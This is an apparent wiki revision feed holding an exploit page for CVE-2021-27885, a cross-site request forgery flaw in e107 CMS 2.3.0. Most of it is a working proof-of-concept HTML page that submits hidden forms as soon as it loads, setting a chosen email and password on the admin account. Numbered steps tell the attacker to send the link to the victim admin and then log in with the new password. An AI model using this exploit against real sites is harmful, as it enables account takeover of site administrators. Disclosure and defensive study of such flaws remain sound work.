https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-27885_e107_CMS_2.3.0_%E8%B7%A8%E7%AB%99%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E
CVE-2021-27885 e107 CMS 2.3.0 跨站請求偽造漏洞 - Revision history
2026-04-26T15:37:50Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-27885_e107_CMS_2.3.0_%E8%B7%A8%E7%AB%99%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E&diff=3625&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: e107 CMS 2.3.0 - CSRF # Date: 04/03/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://e107.org # Software Link: https://e107.org/downloa..."
2021-05-30T02:41:59Z
<p>Created page with "==EXP== <pre> # Exploit Title: e107 CMS 2.3.0 - CSRF # Date: 04/03/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://e107.org # Software Link: https://e107.org/downloa..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: e107 CMS 2.3.0 - CSRF<br />
# Date: 04/03/2021<br />
# Exploit Author: Tadjmen<br />
# Vendor Homepage: https://e107.org<br />
# Software Link: https://e107.org/download<br />
# Version: 2.3.0<br />
# Tested on: Windows 10<br />
# CVE : CVE-2021-27885<br />
<br />
CSRF vulnerability on e107 CMS<br />
<br />
## Bug Description<br />
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.<br />
<br />
## How to Reproduce<br />
Steps to reproduce the behavior:<br />
1. Create a CSRF login POC using the following code.<br />
<br />
```<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><br />
<br />
<html><br />
<head><br />
<title>Cross Site Request Forgery (Edit Existing Admin details)</title><br />
</head><br />
<br />
<body onload="javascript:fireForms()"><br />
<script language="JavaScript"><br />
<br />
function fireForms()<br />
{<br />
var count = 2;<br />
var i=0;<br />
<br />
for(i=0; i<count; i++)<br />
{<br />
document.forms[i].submit();<br />
}<br />
}<br />
<br />
</script><br />
<br />
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2><br />
<br />
<form method="POST" name="form0" action="<br />
http://localhost/[path-to-e107-cms]/usersettings.php"><br />
<br />
<input type="hidden" name="loginname" value="admin"/><br />
<input type="hidden" name="email" value="[email]"/><br />
<input type="hidden" name="password1" value="[password]"/><br />
<input type="hidden" name="password2" value="[password]"/><br />
<input type="hidden" name="hideemail" value="1"/><br />
<input type="hidden" name="image" value=""/><br />
<input type="hidden" name="signature" value=""/><br />
<input type="hidden" name="updatesettings" value="Save settings"/><br />
<input type="hidden" name="_uid" value="2"/><br />
<br />
<br />
<br />
<br />
</form><br />
<br />
</body><br />
</html><br />
```<br />
<br />
<br />
2. Replace the email and password with the valid credentials.<br />
3. Send the link script to the victim (admin) to make them click.<br />
4. Login with new admin password<br />
<br />
</pre></div>
Pwnwiki